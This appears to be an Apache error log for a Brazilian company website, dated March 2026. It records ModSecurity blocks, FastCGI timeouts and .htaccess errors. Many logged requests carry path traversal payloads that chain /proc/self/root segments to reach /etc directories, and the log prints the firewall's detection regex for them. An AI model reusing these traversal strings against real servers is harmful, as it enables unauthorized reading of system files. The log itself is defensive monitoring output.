[Wed Mar 18 02:21:18.294311 2026] [access_compat:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:49014] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run
[Wed Mar 18 02:21:28.125824 2026] [proxy_fcgi:error] [pid 15051:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56694] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:21:40.656848 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.228.61:33532] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo2ZOyqAr6etmhZHNpthAAAAEc"]
[Wed Mar 18 02:21:50.121885 2026] [proxy_fcgi:error] [pid 15826:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56970] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:22:13.136432 2026] [proxy_fcgi:error] [pid 11816:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57330] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:22:14.197342 2026] [core:alert] [pid 31803:tid 140411708356352] [client 74.7.243.128:37060] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/firmware
[Wed Mar 18 02:22:16.167174 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.241.31:56916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo2iCmAPhZkrhU8w4kkoAAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:22:23.218090 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:38144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo2j8df6f5d65gmYZSGYwAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:22:37.148452 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57706] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:22:59.125909 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57972] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:23:22.510040 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58300] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:23:44.029835 2026] [proxy_fcgi:error] [pid 29882:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58628] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:23:44.301451 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.241.31:50720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo24EzinOy1jxa1j4fHnAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:24:06.129881 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58946] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:24:12.683616 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:53448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo2_Pu8EFLIOrSqIpu91wAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:24:28.125799 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59282] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:24:37.579980 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:55216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo3FeyqAr6etmhZHNpt6gAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:24:50.121795 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59738] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:24:51.762463 2026] [mime_magic:error] [pid 17653:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:22872] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 02:25:06.189852 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:50458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo3Mta6ubjKNq_cu4ZMVwAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:25:13.089816 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60030] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:25:35.129816 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60360] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:25:58.205870 2026] [proxy_fcgi:error] [pid 15051:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60614] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:25:59.626024 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.244.43:48892] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo3Z9Y0UrI5A3LftIxFewAAAYo"]
[Wed Mar 18 02:26:04.157240 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:45522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo3bMdf6f5d65gmYZSG4wAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 02:26:20.110619 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60856] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:26:41.190824 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.228.61:59906] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo3kfu8EFLIOrSqIpu-DwAAAko"]
[Wed Mar 18 02:26:42.120971 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32890] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:27:03.192009 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33142] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:27:07.089549 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:52034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo3q9Y0UrI5A3LftIxFuwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:27:25.130793 2026] [proxy_fcgi:error] [pid 11816:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33378] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:27:48.132998 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33788] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:28:10.115890 2026] [proxy_fcgi:error] [pid 15051:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34120] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:28:32.121790 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34378] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:28:54.033843 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34636] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:28:56.206736 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.241.31:52640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo4GCmAPhZkrhU8w4klTwAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:29:16.137839 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34866] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:29:38.125819 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35056] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:29:39.679124 2026] [mime_magic:error] [pid 26799:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:46522] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 02:29:39.679380 2026] [access_compat:error] [pid 26799:tid 140411708356352] [client 216.73.216.191:46522] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Wed Mar 18 02:30:00.118193 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35284] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:30:01.121871 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:34294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo4WUzinOy1jxa1j4fIJAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:30:22.129827 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:36220] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:30:45.153794 2026] [proxy_fcgi:error] [pid 15051:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36448] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:30:56.199678 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:42582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo4kOw_le52K8_3pV2WiQAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:31:07.125806 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36712] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:31:09.491898 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.244.43:38862] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo4neyqAr6etmhZHNpucQAAAEQ"]
[Wed Mar 18 02:31:29.131282 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36896] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:31:41.191501 2026] [:error] [pid 17887:tid 140411557287680] [client 216.73.216.191:35908] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo4vQkwaGbbGflqUZDKawAAANY"]
[Wed Mar 18 02:31:42.351229 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.228.61:40886] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo4vuw_le52K8_3pV2WnwAAAhg"]
[Wed Mar 18 02:31:51.137779 2026] [proxy_fcgi:error] [pid 11816:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37228] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:31:59.887750 2026] [core:alert] [pid 17887:tid 140411649607424] [client 74.7.243.128:39616] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/udev
[Wed Mar 18 02:32:13.046080 2026] [proxy_fcgi:error] [pid 11816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37542] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:32:21.348730 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:51918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo45eoXxyEfFpUF8f8j2wAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:32:35.089829 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37810] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:32:57.037865 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38068] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:32:58.217549 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:49534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo5Cuw_le52K8_3pV2WwgAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
